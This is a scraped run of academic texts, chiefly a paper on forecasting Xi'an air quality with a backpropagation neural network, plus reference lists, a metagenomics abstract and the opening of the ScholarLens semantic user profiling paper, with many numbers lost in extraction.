, different areas of the picture by performing a predefined area selection action, and iterates the process to make the bounding box tightly surround the object, finally achieved the positioning and classification of object. experiments show that the model can effectively detect the object in the image. references [ ] sutton r s, barto a g. reinforcement learning: an introduction[m]. mit press, . [ ] gagniuc p a. markov chains: from theory to implementation and experimentation[m]. john wiley & sons, . [ ] hu y, xie x, ma w y, et al. salient region detection using weighted feature maps based on the human visual attention model[c]//pacific-rim conference on multimedia. springer, berlin, heidelberg, : - . [ ] ren s, he k, girshick r, et al. faster r-cnn: towards real-time object detection with region proposal networks[c]//advances in neural information processing systems. : - . [ ] lecun y, bottou l, bengio y, et al. gradient-based learning applied to document recognition[j]. proceedings of the ieee, , ( ): - . [ ] dalal n, triggs b. histograms of oriented gradients for human detection[c]// ieee computer society conference on computer vision and pattern recognition (cvpr' ). ieee, , : - . [ ] boser b e, guyon i m, vapnik v n. a training algorithm for optimal margin classifiers[c]//proceedings of the fifth annual workshop on computational learning theory. : - . [ ] papandreou g, kokkinos i, savalle p a. modeling local and global deformations in deep learning: epitomic convolution, multiple instance learning, and sliding window detection[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] carreira j, sminchisescu c. cpmc: automatic object segmentation using constrained parametric min-cuts[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] uijlings j r r, van de sande k e a, gevers t, et al. selective search for object recognition[j]. international journal of computer vision, , ( ): - . [ ] pont-tuset j, arbelaez p, barron j t, et al. multiscale combinatorial grouping for image segmentation and object proposal generation[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] silver d, huang a, maddison c j, et al. mastering the game of go with deep neural networks and tree search[j]. nature, , ( ): - . [ ] caicedo j c, lazebnik s. active object localization with deep reinforcement learning[c]//proceedings of the ieee international conference on computer vision. : - . [ ] mathe s, pirinen a, sminchisescu c. reinforcement learning for visual object detection[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] watkins c j c h, dayan p. q-learning[j]. machine learning, , ( - ): - . [ ] mnih v, kavukcuoglu k, silver d, et al. playing atari with deep reinforcement learning[j]. arxiv preprint arxiv: . , . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - analysis and forecast of urban air quality based on bp neural network wenjing wang school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com shengquan yang school of computer science and engineering xi'an technological university xi'an, china e-mail: xaitysq@ .com abstract—the rapid economic development has led to the declining quality of the atmospheric environment. at present, my country is facing a very serious problem of atmospheric environmental pollution. 
accurate prediction of air quality plays a vital role in the realization of air pollution control by environmental protection departments. based on the historical air pollution concentration data, this paper establishes a bp neural network model to learn the statistical law of air pollutant values to realize the prediction of air quality in the future. through the analysis of the target of air quality prediction, the design of an air quality prediction method based on bp neural network is designed. this method includes four stages: air pollutant concentration data collection, data processing, air quality index calculation, and prediction network construction. the experimental results show that the air quality prediction method based on bp neural network designed and implemented in this paper, combined with the developed air quality prediction system, can effectively predict the recent changes in air quality and various air pollutant concentrations. by collecting the concentration data of air pollutants and learning the changes of air pollutants to achieve air quality prediction, it provides a quantitative reference for government environmental protection departments to achieve air pollution control. keywords-aqi; air quality prediction; bp neural network i. introduction air quality prediction, as the name suggests, is based on the historical emission concentration values of various pollutant items in the air to predict the concentration values of various pollutants in the air pollution in the future and the air environment quality[ ]. as china's rapid economic development has led to serious atmospheric environmental pollution problems, the state and the public have paid more and more attention to the treatment and prevention of air pollution. the government environmental protection department hopes to keep abreast of the details of local air pollution and the recent changes in air pollution. the public also hopes to be able to understand the impact of air quality around them on their health in time. in recent years, the state has increased its plans for ecological environmental protection, and the plan clearly clarified that atmospheric pollution control is one of the key contents. the environmental protection departments of local governments strengthen air pollution control work, hoping to understand the changes in air quality in a timely manner by establishing an air quality prediction model. international journal of advanced network, monitoring and controls volume , no. , xu dahai proposed an atmospheric advection diffusion box model in , in which the concept of the air pollution potential index was clearly determined, which effectively improved the accuracy of potential prediction on the basis of existing research [ ]. in , liu shi proposed a statistical model for potential prediction based on the air pollution of changchun city. the model achieved a certain prediction effect [ ]. but generally speaking, the accuracy of the potential prediction is very low, so it needs to be used together with other prediction methods, and cannot be used alone. the chemical model for high resolution of the troposphere in the atmosphere established by lei xiaoen is a typical numerical prediction model. using this numerical prediction model can realize the prediction of the changing process of air pollutants in the atmosphere [ ]. due to its own characteristics, numerical prediction requires detailed geographic, meteorological, and pollution sources to realize the air quality prediction process. 
collecting these data in practice incurs huge costs, and the data are difficult to obtain. in addition, numerical prediction models require a large amount of hardware computing resources to compute the changing trend of air pollution at high speed; the computational complexity is high and the runtime long, so numerical prediction models are currently not popular in small and medium-sized cities. pai in taiwan used a grey model to achieve air quality prediction, and the final results show that this method can achieve good prediction performance [ ]. the time series analysis and multiple regression methods among the statistical prediction approaches simplify many of the changing factors that affect air quality and make many assumptions during training, so the accuracy of the resulting air quality predictions still needs to be improved. the neural network has a good approximation effect in air quality prediction: newly acquired air pollutant information can be continuously fed into the network to update the prediction model in time and improve prediction accuracy, giving the neural network strong dynamic adaptability and fault tolerance in this task. in his research, wang jian pointed out that the bp neural network has advantages that other methods do not have for problems such as air quality prediction [ ]. this paper therefore builds an air quality prediction model based on the bp neural network, providing government environmental protection departments with air pollution trends. ii. air quality related factors aqi is the abbreviation of air quality index. the aqi does not refer to the value of a specific pollutant; it reduces the concentrations of the six air pollutants so2, no2, o3, co, pm2.5 and pm10 to a single dimensionless index that represents the overall situation of air quality [ ]. according to the size of the aqi value, air pollution can be divided into different levels, and the air quality level indicates the overall air quality in the local area over a period of time. the goal of this research is to make a short-term prediction of the aqi in xi'an: the six main pollutant concentrations underlying the aqi are selected as features to build an air quality prediction model, improve its prediction accuracy and efficiency, and provide accurate air quality information for environmental monitoring and governance. in terms of data set acquisition, the air quality pollutant concentration data come from the weather post website. using web crawler technology to crawl the website's air quality data module, data from october to december are obtained as the relevant feature data, which form the experimental data set after preprocessing. the original data do not necessarily meet the needs of the prediction model and usually need to be processed before the training model is constructed, so that the collected raw data meet the needs of the model. in studying the air quality prediction method, the construction of the prediction model mainly needs to consider missing-data processing, outlier processing, and data normalization.
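as a concrete illustration of these three preprocessing steps, which the following paragraphs describe in detail (mean-value imputation of missing entries, treating negative concentrations as outliers, and z-score normalization), a minimal sketch is given below. it assumes the pollutant concentrations are held in a pandas dataframe with one column per pollutant; the dataframe layout and column names are illustrative assumptions, not part of the original paper.

```python
import pandas as pd

def preprocess(df: pd.DataFrame) -> pd.DataFrame:
    """clean and normalize pollutant concentration data.

    assumes one numeric column per pollutant, e.g.
    ['pm2.5', 'pm10', 'so2', 'no2', 'co', 'o3'] (illustrative names).
    """
    # outlier handling: negative concentrations are physically impossible,
    # so they are treated as missing values, as described in the paper
    df = df.mask(df < 0)
    # missing-value handling: mean-value filling replaces each missing
    # entry with the mean of the available historical data in that column
    df = df.fillna(df.mean())
    # z-score normalization: x* = (x - mu) / sigma, so that all features
    # are on the same order of magnitude for training the network
    return (df - df.mean()) / df.std()
```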
in this paper, the mean value filling method is used to deal with missing values: each missing value is replaced with the average of the historical data. this method is simple to implement and suitable for models with high accuracy requirements. a data anomaly is an unreasonable value in the data set; for air pollutant concentration data, for example, a negative concentration value is judged to be abnormal. in the method of this paper, outliers are regarded as missing values and handled in the same way. to prevent the network weights from overflowing because they become too large or too small, and to eliminate the possible impact of input variables having different dimensions or widely different magnitudes, the input vector of the neural network needs to be processed. the collected raw data set is normalized so that every component of each input vector is on the same order of magnitude, which makes it suitable for training. this article uses the z-score standardization method, calculated as

$$x^{*} = \frac{x - \mu}{\delta}$$

where $\mu$ is the mean of all sample data and $\delta$ is the standard deviation of all sample data.

iii. air quality prediction model a. bp neural network the bp neural network is an error back-propagation neural network. rumelhart proposed the error back-propagation algorithm in the study of feed-forward neural networks, referred to as the bp neural network algorithm. each layer of a bp neural network contains many neuron nodes; there are no connections between neurons within a layer, while the neuron nodes of adjacent layers are fully connected [ ]. the input layer accepts the network input, and each neuron generates the corresponding connection weight according to the input information it receives. the function of the hidden layer in the bp neural network is information detection. according to tambe's global approximation theory, even a neural network with only one hidden layer can approximate any measurable input–output mapping arbitrarily well, as long as there are enough neuron nodes and appropriate connection functions and weights are selected [ ]. the bp neural network can continuously take in new information, update the network, and adjust its structure to fit the characteristics of the model, and thus has strong self-adaptability and fault tolerance. the bp neural network learning process works as follows: after receiving the initial input and the given target output, the forward information propagation phase is performed. in this phase, the output of each hidden-layer unit is first computed from the input-layer units, and the same procedure is then used to compute the output of each output-layer unit, which determines the error between the actual output of the output layer and the target output. if the error is within the user's acceptable range, the weights and thresholds are fixed and training ends; otherwise, the process enters the second phase. the second phase is the error back-propagation phase. in this phase, the partial derivative of the error is first calculated using the output of the output layer; the computed partial derivatives are then weighted, summed, and propagated back through the hidden layer toward the input layer, and finally the partial derivative computed for each neural unit is used to update the weights [ ]. these two phases are repeated until the error between the actual output and the target output is reduced to an acceptable range. the learning flowchart of the bp neural network (figure: bp neural network learning process) proceeds as follows: begin; provide the initial input and target output; calculate the output of each hidden-layer unit; calculate the output of each output-layer unit; calculate the error between the actual output and the target value; if the error is within the allowable range, fix the weights and thresholds and end; otherwise calculate the output-layer correction error and the hidden-layer correction error, adjust the connection weights from the input layer to the hidden layer and the thresholds of the hidden-layer units, update the connection weights of each layer, and repeat. from the above, the algorithm flow of the bp neural network can be divided into two processes, as follows: 1) forward propagation sub-process. let the input value of input-layer node $i$ be $x_i$, the weight between input-layer node $i$ and hidden-layer node $h$ be $w_{ih}$, the threshold of hidden-layer node $h$ be $b_h$, the weight between hidden-layer node $h$ and output-layer node $o$ be $w_{ho}$, the threshold of output-layer node $o$ be $b_o$, the network activation function be $f$, the output value of output-layer node $o$ be $yo_o$, and the expected output value be $y_o$. the forward propagation process of the bp neural network computes the output-layer output value $yo_o$ from the input-layer input value $x_i$. the specific steps are as follows: a) calculate the input and output values of the hidden layer. hidden-layer input value:

$$hi_h = \sum_{i=1}^{m} w_{ih}\, x_i + b_h \quad (h = 1, 2, \ldots, n)$$

hidden-layer output value:

$$ho_h = f(hi_h) \quad (h = 1, 2, \ldots, n)$$

b) calculate the input and output values of the output layer. output-layer input value:

$$yi_o = \sum_{h=1}^{n} w_{ho}\, ho_h + b_o \quad (o = 1, 2, \ldots, k)$$

output-layer output value:

$$yo_o = f(yi_o) \quad (o = 1, 2, \ldots, k)$$

2) back propagation sub-process. the back-propagation process of the bp neural network is based on the widrow-hoff learning rule. the error function is

$$e(w, b) = \frac{1}{2} \sum_{o=1}^{k} (y_o - yo_o)^2$$

the main goal of the bp neural network algorithm is to iteratively modify the weights and thresholds between layers so as to minimize the value of the error function. according to the widrow-hoff learning rule, the weights and thresholds are adjusted continually along the direction of steepest descent of the sum of squared errors. by the gradient descent method, the weight change is proportional to the gradient of the error function at the current position:

$$\Delta w = -\eta_1 \frac{\partial e(w, b)}{\partial w}$$

and similarly for the thresholds:

$$\Delta b = -\eta_2 \frac{\partial e(w, b)}{\partial b}$$

where $\eta_1$ and $\eta_2$ are the learning rates, with values in the range $(0, 1)$.
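as a compact illustration of the forward pass, the squared-error objective, and the gradient-descent updates just described, a minimal numpy sketch of one training step for a three-layer network is given below. the layer sizes, the single learning rate, and the use of a sigmoid activation in both layers are illustrative assumptions, not values taken from the paper.

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def train_step(x, y, w_ih, b_h, w_ho, b_o, lr=0.1):
    """one forward/backward pass of a 3-layer bp network (sketch).

    x: input vector (m,), y: target vector (k,)
    w_ih: (m, n) input-to-hidden weights, b_h: (n,) hidden thresholds
    w_ho: (n, k) hidden-to-output weights, b_o: (k,) output thresholds
    """
    # forward propagation: hi_h = sum_i w_ih * x_i + b_h, ho_h = f(hi_h)
    hi = x @ w_ih + b_h
    ho = sigmoid(hi)
    # yi_o = sum_h w_ho * ho_h + b_o, yo_o = f(yi_o)
    yi = ho @ w_ho + b_o
    yo = sigmoid(yi)

    # squared-error objective e = 1/2 * sum_o (y_o - yo_o)^2
    e = 0.5 * np.sum((y - yo) ** 2)

    # output-layer correction error: delta_o = (yo - y) * f'(yi),
    # with f'(yi) = yo * (1 - yo) for the sigmoid
    delta_o = (yo - y) * yo * (1.0 - yo)
    # hidden-layer correction error, propagated back through w_ho
    delta_h = (delta_o @ w_ho.T) * ho * (1.0 - ho)

    # gradient-descent updates: delta_w = -lr * de/dw, delta_b = -lr * de/db
    w_ho -= lr * np.outer(ho, delta_o)
    b_o -= lr * delta_o
    w_ih -= lr * np.outer(x, delta_h)
    b_h -= lr * delta_h
    return e
```

the paper later selects the log-sigmoid for the hidden layer and relu for the output layer; in the sketch only the activation function and its derivative would change.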
the specific steps of the bp neural network back-propagation process are as follows: a) calculate the adjustment of the weights between the hidden layer and the output layer and of the output-layer thresholds. for $w_{ho}$, from the gradient-descent rule above we get

$$\Delta w_{ho} = -\eta_1 \frac{\partial e(w,b)}{\partial w_{ho}} = -\eta_1 \frac{\partial e}{\partial yi_o}\,\frac{\partial yi_o}{\partial w_{ho}}$$

from the forward-propagation formulas we get

$$\frac{\partial yi_o}{\partial w_{ho}} = ho_h$$

$$\frac{\partial e}{\partial yi_o} = -(y_o - yo_o)\, f'(yi_o) \equiv -\delta_o$$

combining these, we get

$$\Delta w_{ho} = \eta_1\, \delta_o\, ho_h$$

and similarly, for the output-layer threshold,

$$\Delta b_o = \eta_2\, \delta_o$$

b) calculate the adjustment of the weights between the input layer and the hidden layer and of the hidden-layer thresholds. for $w_{ih}$, by the same rule,

$$\Delta w_{ih} = -\eta_1 \frac{\partial e(w,b)}{\partial w_{ih}} = -\eta_1 \frac{\partial e}{\partial hi_h}\,\frac{\partial hi_h}{\partial w_{ih}}$$

since $hi_h$ affects all output-layer units, we have

$$\frac{\partial e}{\partial hi_h} = \sum_{o=1}^{k} \frac{\partial e}{\partial yi_o}\,\frac{\partial yi_o}{\partial hi_h}$$

with

$$\frac{\partial yi_o}{\partial hi_h} = w_{ho}\, f'(hi_h)$$

so that

$$\frac{\partial e}{\partial hi_h} = -\Big(\sum_{o=1}^{k} \delta_o\, w_{ho}\Big) f'(hi_h) \equiv -\delta_h$$

combining these, we get

$$\Delta w_{ih} = \eta_1\, \delta_h\, x_i$$

and similarly, for the hidden-layer threshold,

$$\Delta b_h = \eta_2\, \delta_h$$

c) update the weights and thresholds of the bp neural network. the updated weights and thresholds between the hidden layer and the output layer are

$$w_{ho}^{\,n+1} = w_{ho}^{\,n} + \eta_1\, \delta_o\, ho_h, \qquad b_o^{\,n+1} = b_o^{\,n} + \eta_2\, \delta_o$$

and the updated weights and thresholds between the input layer and the hidden layer are

$$w_{ih}^{\,n+1} = w_{ih}^{\,n} + \eta_1\, \delta_h\, x_i, \qquad b_h^{\,n+1} = b_h^{\,n} + \eta_2\, \delta_h$$

b. design of air quality prediction model the core algorithm used in this paper is the bp neural network algorithm. according to the characteristics of the bp neural network, the number of neuron nodes in each layer of the network must be determined, and the network activation function and initial parameters must be selected. determining the number of input-layer nodes is very important: too many or too few will affect the prediction accuracy of the model, so the number should be determined according to the actual application. the input and output layers of the network are designed based on the collected data. the number of input-layer nodes is six, corresponding to the daily concentration values of the six pollutants pm2.5, pm10, so2, no2, co and o3; the number of output-layer nodes is one, namely the aqi value of the next day. the bp neural network in this work has three layers, with only one hidden layer. there is no theoretical guidance for determining the number of hidden-layer nodes, which is usually chosen from practical experience. an empirical formula for selecting the number of hidden-layer nodes is

$$p = \sqrt{n + q} + a$$

where $n$ and $q$ are the numbers of neurons in the input and output layers, respectively, and the constant $a$ is generally taken as a small integer. the number of hidden-layer nodes in this work is first determined from this formula. the network activation function is an important factor affecting the performance of the bp neural network algorithm, since it gives the network its nonlinear processing capability. three activation functions are commonly used in bp neural networks: the log-sigmoid function, the tanh function and the relu function.
considering the characteristics of the research data and of these three activation functions, in this paper the hidden layer of the bp network uses the log-sigmoid function as its activation function and the output layer uses the relu function (see the figures of the log-sigmoid and relu functions). since the sample data are normalized, the initial weights and thresholds take values in the interval [-1, 1] and should be a set of random numbers that are not exactly equal. iv. experiment the experimental simulation platform used in this article is the python programming language. the air data used in the experiment are the air quality data of xi'an from october to december, sorted as a continuous time series; the data for a number of consecutive days are taken as the test set, and the rest as the training set. to evaluate the model, this paper uses the mean absolute percentage error and the root mean square error, calculated as

$$mape = \frac{1}{n} \sum_{i=1}^{n} \frac{|y_i - y_i^{*}|}{y_i}$$

$$rmse = \sqrt{\frac{1}{n} \sum_{i=1}^{n} (y_i - y_i^{*})^2}$$

where $y_i$ is the measured value and $y_i^{*}$ the predicted value. experimental results show that the prediction model established in this paper has high accuracy and efficiency for pm2.5 concentration prediction. the simulation results are shown in the figure comparing sample prediction results with real values, and the measured and predicted values of the first groups of samples are compared in table i (comparison between measured and predicted aqi, listing the measured aqi, the predicted aqi, and the pm2.5, pm10, so2, no2, co and o3 concentrations; the numeric entries are not recoverable from the source). after analyzing the prediction results, it is concluded that under the experimental conditions given in this paper the average error and the root mean square error of the experimental results are both low, and, as can be seen from the figure and table, the bp neural network established in this paper has a lower prediction error even when the air quality fluctuates greatly. this research also has some shortcomings at present: it only considers factors that can be quantitatively analyzed and does not take into account unexpected events such as natural disasters or human factors; because these factors are unpredictable and hard to quantify, they have not been considered in this article, and we hope to analyze them in future work. v. conclusion this article addresses the current situation of severe air pollution problems facing china. traditional online air pollutant monitoring systems cannot effectively use historical air pollutant data to provide a quantitative reference for air pollution control measures, so environmental protection departments urgently need an air quality prediction system to supervise and control local air pollution. this paper studies a method for air quality prediction based on the bp neural network: by learning the pattern of change in historical pollutant concentration data, it predicts the air quality trend for a period of time in the future and helps government environmental protection departments formulate air pollution control policies by providing quantitative indicators and references.
this article first explains the research background and significance of this topic, and analyzes the necessity of establishing an air quality prediction system for air pollution control. based on the analysis of the domestic research results of air quality prediction, combined with the regional characteristics and actual conditions of prefectural and municipal government departments, a framework model for air quality prediction based on statistical prediction is proposed. then, an air quality prediction method model based on bp neural network is established, and the realization of the method includes three stages of air pollutant project concentration data collection, data processing, and prediction algorithm network model construction. this paper uses bp neural network to predict the air quality in xi'an. through the analysis of experimental results, bp neural network has a significant effect in dealing with such nonlinear problems, especially in the place where the aqi fluctuation is relatively large. the research is conducive to the prediction and prevention of air pollution problems. the government can also make appropriate measures and decisions based on the prediction results, such as closing schools or reducing outdoor sports, thereby reducing the damage caused by pollution. it can also provide new ways and methods for forecasting research in other fields. acknowledgment the research is supported by the new network and detection control national and local joint engineering laboratory. (financing projects no. gsysj ). references [ ] ren wanhui, su zongzong, zhao hongde. advances in the study of urban environmental air pollution forecasting [j]. environmental protection science, , ( ): - . [ ] xu dahai, zhu rong. popularization and application of urban air pollution forecasting model [j]. annual report of cams, ( ): . [ ] liu shi, wang ning, zhu qiwen, wang xinguo, hu zhongming, chen changsheng. research on the statistical model of air pollution potential forecast in changchun city [j]. meteorology, ( ): - . [ ] han zhiwei, du shiyong, lei xiaoen, ju lixia, wang qingeng. urban air pollution numerical prediction model system and its application [j]. chinese environmental science, ( ): - . [ ] tzu‐yi pai,keisuke hanaki,ren‐jie chiou. forecasting hourly roadside particulate matter in taipei county of taiwan based on first‐order and one‐variable grey model [j]. john wiley & sons, ltd, , ( ). [ ] wang jian, hu xiaomin, zheng longxi, liu zhenshan. research on air pollution forecasting method based on bp model [j]. environmental science research, ( ): - . [ ] wang qingeng, xia sijia, wan yixue, jin longshan. problems and new ideas in current urban air pollution forecasting methods [j]. environmental science and technology, , ( ): - . [ ] a. elkamel, s. abdul-wahab, w. bouhamra, e. alper. measurement and prediction of ozone levels around a heavily industrialized area: a neural network approach [j]. advances in environmental research, , ( ). [ ] jaakko kukkonen, leena partanen, ari karppinen, juhani ruuskanen, heikki junninen, mikko kolehmainen, harri niska, stephen dorling, tim chatterton, rob foxall, gavin cawley. extensive evaluation of neural network models for the prediction of no and pm concentrations, compared with a deterministic modelling system and measurements in central helsinki [j]. atmospheric environment, , ( ). [ ] hunt k.j., sbarbaro d., Żbikowski r., gawthrop p. j. neural networks for control systems†”a survey [j]. pergamon, , ( ). 
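as a small supplement to the air-quality paper above, the two evaluation metrics it uses (mape and rmse) can be computed as follows; the function and array names are illustrative only and are not taken from the paper's code.

```python
import numpy as np

def mape(y_true: np.ndarray, y_pred: np.ndarray) -> float:
    """mean absolute percentage error: (1/n) * sum(|y_i - y_i*| / y_i)."""
    return float(np.mean(np.abs(y_true - y_pred) / y_true))

def rmse(y_true: np.ndarray, y_pred: np.ndarray) -> float:
    """root mean square error: sqrt((1/n) * sum((y_i - y_i*)^2))."""
    return float(np.sqrt(np.mean((y_true - y_pred) ** 2)))
```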
[pdf] multiple comparative metagenomics using multiset k-mer counting (semantic scholar record). benoit g, peterlongo p, mariadassou m, drezen e, schbath s, lavenier d, lemaitre c. multiple comparative metagenomics using multiset k-mer counting. peerj comput. sci. abstract (background): large scale metagenomic projects aim to extract biodiversity knowledge between different environmental conditions. current methods for comparing microbial communities face important limitations. those based on taxonomical or functional assignation rely on a small subset of the sequences that can be associated to known organisms. on the other hand, de novo methods, that compare the whole sets of sequences, either do not scale up on ambitious metagenomic projects or do not provide …
submitted july, accepted june, published july. corresponding author: bahar sateli, sateli@semanticsoftware.info. academic editor: kathryn laskey. additional information and declarations can be found on page. doi . /peerj-cs. copyright sateli et al., distributed under creative commons cc-by. open access. scholarlens: extracting competences from research publications for the automatic generation of semantic user profiles. bahar sateli, felicitas löffler, birgitta könig-ries and rené witte. semantic software lab, department of computer science and software engineering, concordia university, montreal, quebec, canada; heinz-nixdorf-chair for distributed information systems, department of mathematics and computer science, friedrich schiller university jena, jena, germany. abstract motivation. scientists increasingly rely on intelligent information systems to help them in their daily tasks, in particular for managing research objects, like publications or datasets. the relatively young research field of semantic publishing has been addressing the question of how scientific applications can be improved through semantically rich representations of research objects, in order to facilitate their discovery and re-use. to complement the efforts in this area, we propose an automatic workflow to construct semantic user profiles of scholars, so that scholarly applications, like digital libraries or data repositories, can better understand their users' interests, tasks, and competences, by incorporating these user profiles in their design. to make the user profiles sharable across applications, we propose to build them based on standard semantic web technologies, in particular the resource description framework (rdf) for representing user profiles and linked open data (lod) sources for representing competence topics. to avoid the cold start problem, we suggest to automatically populate these profiles by analyzing the publications (co-)authored by users, which we hypothesize reflect their research competences. results. we developed a novel approach, scholarlens, which can automatically generate semantic user profiles for authors of scholarly literature. for modeling the competences of scholarly users and groups, we surveyed a number of existing linked open data vocabularies. in accordance with the lod best practices, we propose an rdf schema (rdfs) based model for competence records that reuses existing vocabularies where appropriate. to automate the creation of semantic user profiles, we developed a complete, automated workflow that can generate semantic user profiles by analyzing full-text research articles through various natural language processing (nlp) techniques. in our method, we start by processing a set of research articles for a given user.
competences are derived by text mining the articles, including syntactic, semantic, and lod entity linking steps. we then populate a knowledge base in rdf format with user profiles containing the extracted competences.we implemented our approach as an open source library and evaluated our system through two user studies, resulting in mean average precision (map) of up to %. as part of the evaluation, we also analyze the impact of semantic zoning of research articles on the accuracy of the resulting profiles. finally, we demonstrate how these semantic user profiles can be applied in a number of use cases, including article ranking for personalized search and finding scientists competent in a topic —e.g., to find reviewers for a paper. how to cite this article sateli et al. ( ), scholarlens: extracting competences from research publications for the automatic generation of semantic user profiles. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:sateli@semanticsoftware.info https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. availability. all software and datasets presented in this paper are available under open source licenses in the supplements and documented at http://www.semanticsoftware. info/semantic-user-profiling-peerj- -supplements. additionally, development releases of scholarlens are available on our github page: https://github.com/ semanticsoftwarelab/scholarlens. subjects human-computer interaction, artificial intelligence, data mining and machine learning, digital libraries keywords natural language processing, semantic user profile, semantic publishing, scholarly user modeling, linked open data introduction researchers increasingly leverage intelligent information systems for managing their research objects, like datasets, publications, or projects. an ongoing challenge is the overload scientists face when trying to identify relevant information, for example when using a web-based search engine: while it is easy to find numerous potentially relevant results, evaluating each of these is still performed manually and thus very time-consuming. we argue that smarter scholarly applications require not just a semantically rich representation of research objects, but also of their users: by understanding a scientist’s interests, competences, projects and tasks, intelligent systems can deliver improved results, e.g., by filtering and ranking results through personalization algorithms (sieg, mobasher & burke, ). so-called user profiles (brusilovsky & millán, ) have been adopted in domains like e-learning, recommender systems or personalized news portals (we provide a brief background on user profiling in the ‘background’). increasingly, they also receive more and more attention in scientific applications, such as expertise retrieval systems. constructing such user models automatically is still a challenging task and even though various approaches have already been proposed, a semantic solution based on linked open data (lod) (heath & bizer, ) principles is still missing. we show that a semantically rich representation of users is crucial for enabling a number of advanced use cases in scholarly applications. 
one of our central points is that a new generation of semantic user profile models are ideally built on standard semantic web technologies, as these make the profiles accessible in an open format to multiple applications that require deeper knowledge of a user’s competences and interests. in the ‘literature review’, we analyze a number of existing lod vocabularies for describing scholars’ preferences and competences. however, they all fall short when it comes to modeling a user’s varying degrees of competence in different research topics across different projects. we describe our solution for scholarly user models in the ‘design’. bootstrapping such a user profile is an infamous issue in recommendation approaches, known as the cold start problem, as asking users to manually create possibly hundreds of entries for their profile is not realistic in practice. our goal is to be able to create an accurate profile of a scientist’s competences, which we hypothesize can be automatically calculated sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements https://github.com/semanticsoftwarelab/scholarlens https://github.com/semanticsoftwarelab/scholarlens http://dx.doi.org/ . /peerj-cs. figure this diagram shows a high-level overview of our approach to semantic user profiling: users can bootstrap their profiles by providing a set of their (co-)authored publications. the extracted knowl- edge is then stored in a knowledge base that can be incorporated in various scholarly applications. re- searchers can then obtain personalized services through applications leveraging the semantic user profiles. based on the publications of each user. towards this end, we developed a novel nlp-based method for analyzing full-text research articles to extract an author’s competences and constructing semantic user profiles in a linked open data format for automatic knowledge base construction. our ideas are implemented in scholarlens library, which we believe is the first open source library that facilitates the automatic construction of scholarly user profiles. the design and implementation of scholarlens are detailed in ‘design’ and ‘implementation’, respectively. a high-level overview of our approach is illustrated in fig. . to evaluate our profile generation approach, we performed two user studies with ten and twenty-five scientists from various research groups across europe and north america. the participants were provided with two different user profiles each, which were automatically generated based on their publications: one based on the articles’ full texts, the second restricted to rhetorical entities (res), like the claims and contributions in a paper (sateli & witte, ). in each study, we asked the participants to evaluate the generated top-n competence entries in their user profiles. the results, provided in the ‘evaluation’, show that our approach can automatically generate user profiles with a precision of up to % (mean average precision for top- competences). sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
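to make the idea of an rdf-based user profile more tangible, the following sketch builds a tiny profile graph with python's rdflib, linking an author to a competence topic drawn from an lod source (dbpedia). the example namespace, the class and property names, and the topic are purely illustrative assumptions; they are not the actual rdfs competence model proposed by the authors.

```python
from rdflib import Graph, Literal, Namespace
from rdflib.namespace import FOAF, RDF, XSD

EX = Namespace("http://example.org/scholar/")      # hypothetical namespace
DBR = Namespace("http://dbpedia.org/resource/")    # lod source for topics

g = Graph()
g.bind("foaf", FOAF)
g.bind("ex", EX)

author = EX["jane-doe"]
competence = EX["jane-doe/competence/1"]

# basic user information via foaf
g.add((author, RDF.type, FOAF.Person))
g.add((author, FOAF.name, Literal("Jane Doe")))

# a competence record pointing to an lod topic, with a confidence score
g.add((competence, RDF.type, EX.CompetenceRecord))   # illustrative class
g.add((competence, EX.competenceFor, author))        # illustrative property
g.add((competence, EX.topic, DBR["Text_mining"]))
g.add((competence, EX.confidence, Literal(0.87, datatype=XSD.double)))

print(g.serialize(format="turtle"))
```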
finally, we illustrate in the ‘application examples’ how semantic user profiles can be leveraged by scholarly information systems in a number of use cases, including a competence analysis for a user (e.g., for finding reviewers for a new paper) and re-ranking of article search results, based on a user’s profile. background in this section, we provide background information on user profiling, competence management and its applications. we also briefly introduce semantic publishing and its connections with natural language processing (nlp) techniques. user profiling and personalization a user profile is an instance of a user model that contains either a user’s characteristics, such as knowledge about a topic, interests and backgrounds, or focuses on the context of a user’s work, e.g., location and time (brusilovsky & millán, ). depending on the application offering personalized content, different features have to be taken into account when modeling user profiles. for instance, educational learning systems typically model a user’s knowledge and background, whereas recommender systems and search applications are more focused on a user’s interests. constructing user profiles requires collecting user information over an extended period of time. this gathering process is called user profiling and distinguishes between explicit and implicit user feedback (gauch et al., ). explicit user feedback actively requests interests from a user, whereas implicit user feedback derives preferences from the user’s activities. commonly used implicit profiling techniques observe the user’s browsing behavior and extract preferences from web or query logs, analyze the browser history and derive interest weights from the numbers of clicks or the time spent on a page. according to findings in gauch et al. ( ), there is no significant evidence that an explicit user feedback mechanism results in better personalized content than implicitly recorded user information. therefore, personalized applications nowadays mainly employ implicit profiling techniques, since they are less intrusive from a user’s perspective. in the context of scholarly applications, user profiles have been used in ad-hoc approaches, such as the expertise retrieval system used at tilburg university (uvt) (https: //www.tilburguniversity.edu/), academic search engines like aminer (https://aminer.org) or personalized paper recommendations in google scholar (https://scholar.google.com). the most dominant representation of user characteristics in this type of application is a weighted vector of keywords. this simple mathematical description permits classical information filtering algorithms, such as cosine similarity (manning, raghavan & schütze, ), in order to measure item-to-item, user-to-user and item-to-user similarity. competence management e-learning applications were the earliest systems to provide personalized content based on a user’s background knowledge and skill sets. the identified competence gaps were used to find appropriate learning strategies to gain the required knowledge to pass a course or to fulfill a certain task. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.tilburguniversity.edu/ https://www.tilburguniversity.edu/ https://aminer.org https://scholar.google.com http://dx.doi.org/ . /peerj-cs. 
